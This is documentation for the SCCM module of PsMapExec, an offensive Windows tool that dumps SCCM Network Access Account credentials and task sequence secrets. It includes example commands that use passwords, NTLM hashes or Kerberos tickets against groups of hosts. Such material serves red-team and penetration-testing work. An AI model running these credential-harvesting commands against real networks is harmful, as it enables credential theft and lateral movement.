SCCM

Dumps local SCCM secrets for Network Access Account credentials and Task sequence data. Collected information is automatically parsed and organized where it will be stored in $PWD\PME\SCCM\.

Uses a stripped down and revised version of SharpSCCM for execution.

Supported Methods

• SMB

• SessionHunter

• WMI

• WinRM

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	Will ommit parsing output from each system.
-ShowOutput	N/A	Displays each targets output to the console
-SuccessOnly	N/A	Display only successful results

Usage Examples

# SMB execution with password authentication, targeting workstations
PsMapExec SMB -Targets "Workstations" -Username [User] -Password [Pass] -Module SCCM

# WinRM execution with hash authentication, targeting servers
PsMapExec WinRM -Targets "Servers" -Username [User] -Hash [Hash] -Module SCCM

# WMI execution with Kerberos ticket authentication (Username not required)
PsMapExec WMI -Targets "All" -Ticket [doI..] -Module SCCM